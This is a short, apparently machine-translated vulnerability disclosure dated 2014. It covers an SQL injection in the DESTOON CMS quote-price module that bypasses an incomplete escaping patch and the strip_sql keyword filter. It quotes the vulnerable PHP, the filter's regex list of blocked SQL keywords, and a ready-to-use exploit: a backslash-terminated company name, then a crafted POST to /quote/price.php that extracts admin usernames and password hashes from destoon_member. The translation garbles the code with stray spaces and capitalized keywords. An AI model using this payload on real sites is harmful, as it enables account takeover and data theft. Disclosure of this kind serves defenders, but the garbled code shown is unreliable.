Injection caused by incomplete DESTOON Patches

Injection caused by incomplete DESTOON Patches

2014-07-22
. Fill in the key areas

Detailed description:

$ Post = daddslashes (dstripslashes ($ post ));

The patch was used only to perform daddslashes for the $ post file, but the special characters can still be registered during registration. A usable place was found.

extract($USER, EXTR_PREFIX_ALL, '');

// Initialization in common. inc. php (LOGIN)



/Module/quote/price. inc. php





24-28

If ($ _ userid) $ post ['company'] = $ _ company; // used here
Require DT_ROOT. '/module/'. $ module. '/price. class. php ';
$ Do = new price;
If ($ do-> pass ($ post )){
$ Do-> add ($ post); // enter the process

Price. class. php

Function add ($ post ){
Global $ MOD, $ L;
$ Post = $ this-> set ($ post );
$ Sqlk = $ sqlv = '';
Foreach ($ post as $ k =>$ v ){
If (in_array ($ k, $ this-> fields) {$ sqlk. = ','. $ k; $ sqlv. = ", '$ V'";} // traverse data
}
$ Sqlk = substr ($ sqlk, 1 );
$ Sqlv = substr ($ sqlv, 1 );
$ This-> db-> query ("insert into {$ this-> table} ($ sqlk) VALUES ($ sqlv)"); // enter the query Process
$ This-> itemid = $ this-> db-> insert_id ();
$ This-> update ($ this-> itemid, $ post );
$ This-> product ($ this-> itemid, $ post ['pid']);
Return $ this-> itemid;
}

Because an escape character breaks single quotes, it can be injected.



Then let's look at his strip_ SQL. This update adds a plus sign, but it can still be bypassed.

function strip_sql($string) {
$match = array("/union/i","/where/i","/0x([a-z0-9]{2,})/i","/select([\s\*\/\-\(\+])/i","/update([\s\*\/\-\(\+])/i","/replace([\s\*\/\-\(\+])/i","/delete([\s\*\/\-\(\+])/i","/drop([\s\*\/\-\(\+])/i","/outfile([\s\*\/\-\(\+])/i","/dumpfile([\s\*\/\-\(\+])/i","/load_file[\s]*\(/i","/substring[\s]*\(/i","/substr[\s]*\(/i","/left[\s]*\(/i","/concat[\s]*\(/i","/concat_ws[\s]*\(/i","/ascii[\s]*\(/i","/hex[\s]*\(/i","/ord[\s]*\(/i","/char[\s]*\(/i");
$replace = array('union','where','0x\\1','select\\1','update\\1','replace\\1','delete\\1','drop\\1','outfile\\1','dumpfile\\1','load_file(','substring(','substr(','left(','concat(','concat_ws(','ascii(','hex(','ord(','char(');
return is_array($string) ? array_map('strip_sql', $string) : preg_replace($match, $replace, $string);
}

(SELECT @ pw: = pw from (SELECT @ p: = (MAKE_SET (-1, admin, username, PASSWORD) as pw from destoon_member order by admin DESC) c limit 0, 1)

This bypasses



This means that the product price is required.

Itemid = product quote id

Exp:

Register an account and then intercept the registered post data and change company to xxxx \

Logon status

Http://x.com/quote/price.php



Itemid = 1 & post [market] = 1 & post [price] = 50 & post [areaid] = 1 & post [company] = OK & post [note] =, (SELECT @ pw: = pw from (SELECT @ p: = (MAKE_SET (-1, admin, username, PASSWORD) as pw from destoon_member order by admin DESC) c limit 0, 1), 1, 1, 1, 1, 1) # & captcha = rs8h & submit = OK

Proof of vulnerability:

Solution:

..